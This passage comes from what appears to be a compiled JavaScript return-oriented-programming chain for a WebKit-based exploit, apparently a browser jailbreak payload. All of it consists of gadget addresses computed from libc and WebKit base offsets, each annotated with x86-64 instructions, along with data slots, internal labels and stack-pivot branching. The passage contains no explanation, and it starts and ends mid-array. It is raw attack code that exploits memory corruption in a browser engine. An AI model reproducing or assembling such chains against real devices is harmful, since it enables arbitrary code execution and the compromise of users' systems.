webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1746: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1748: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+133040, //L1749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133088, //L1752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133056, //L1750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1749: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1750: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1751: db([36, 0]); // 0x24 set_gadget(libc_base+759608,); //pop rax //L1752: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+133192, //L1755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133176, //L1753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1755: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+133368, //L1758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133384, //L1759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133336, //L1756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133352, //L1757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1756: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1757: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1758: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1759: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+133464, //L1760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133480, //L1761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1760: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1761: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+133576, //L1763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+133560, //L1762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop 
rdi ]); //L1762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1763: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+133656, //L1764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1766: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+133776, //L1769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133760, //L1767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1767: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+133888, //L1770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133936, //L1773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133904, //L1771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1770: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1771: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1772: db([12, 0]); // 0xc set_gadget(libc_base+759608,); //pop rax //L1773: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+134040, //L1776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134024, //L1774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 
//pop rcx ]); //L1774: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1776: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+134216, //L1779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134232, //L1780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134184, //L1777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+134200, //L1778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1777: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134312, //L1781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134328, //L1782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1782: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134440, //L1783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134472, //L1785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+134456, //L1784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1783: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1785: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+134648, //L1787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134664, //L1788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134632, //L1786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1786: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1788: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134824, //L1793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134840, //L1794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+134776, //L1790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1790: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1791: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1792: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1793: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1794: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+134952, //L1795+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+134944, //L1795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1795: db([0, 0]); // 0x0 set_gadgets([ ropchain+134968, //L1795+24 ropchain+136656, //L1789 libc_base+764760, //pop rsi ropchain+135008, //L1796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1796: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1798: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+135128, //L1801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+135112, //L1799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1799: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1801: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+135304, //L1804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135320, //L1805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+135272, //L1802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+135288, //L1803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1802: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1803: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1805: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135400, //L1806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135416, //L1807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+144605 //pop rdi ]); //L1806: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1807: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135576, //L1811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+135544, //L1809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135560, //L1810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1808: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L1809: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1810: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1811: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+135632, //L1813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L1813: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+135760, //L1815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135776, //L1816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135744, //L1814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1814: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1815: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1816: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135856, //L1817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135872, //L1818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+144605 //pop rdi ]); //L1817: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1818: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135968, //L1820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135952, //L1819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1819: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1820: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136048, //L1821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1821: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1822: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L1823: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136192, //L1824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136224, //L1826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136208, //L1825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1824: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1825: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1826: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi 
ropchain+136400, //L1828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136416, //L1829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136384, //L1827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1829: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136560, //L1832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136576, //L1833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136528, //L1830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1830: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1831: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1833: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+136648, //L1834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1834: db([0, 0]); // 0x0 //L1789: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+136776, //L1837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136792, //L1838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136760, //L1836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+3236123 //pop r9 ]); //L1836: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1838: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136936, //L1841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136952, //L1842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136904, //L1839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1839: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1840: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1841: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1842: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+137024, //L1843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1843: db([0, 0]); // 0x0 //L1736: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+137152, //L1846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137168, //L1847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137136, //L1845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1846: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1847: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+137280, //L1849 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137328, //L1852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+137296, //L1850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1849: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1851: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1852: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+137440, //L1853+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+137432, //L1853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1853: db([0, 0]); // 0x0 set_gadgets([ ropchain+137456, //L1853+24 ropchain+139800, //L1848 libc_base+764760, //pop rsi ropchain+137496, //L1854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1854: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1856: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+137616, //L1859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137600, //L1857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1857: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1859: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+137792, //L1862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+137808, //L1863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137760, //L1860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+137776, //L1861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1860: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1861: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1863: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+137888, //L1864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137904, //L1865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1865: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+138064, //L1869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+138032, //L1867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+138048, //L1868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1866: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L1867: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1868: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1869: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+138168, //L1871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+138152, 
//L1870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1870: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1871: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138248, //L1872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1872: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1874: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+138368, //L1877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138352, //L1875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1877: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138448, //L1878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+138464, //L1879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1878: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1879: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138608, //L1882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138576, //L1880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+138592, //L1881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1880: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1881: 
db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1882: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138696, //L1884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L1883: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L1884: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138784, //L1885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1885: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1887: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+138904, //L1890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138888, //L1888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1888: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1890: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138992, //L1891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+139008, //L1893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+139064, //L1894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov 
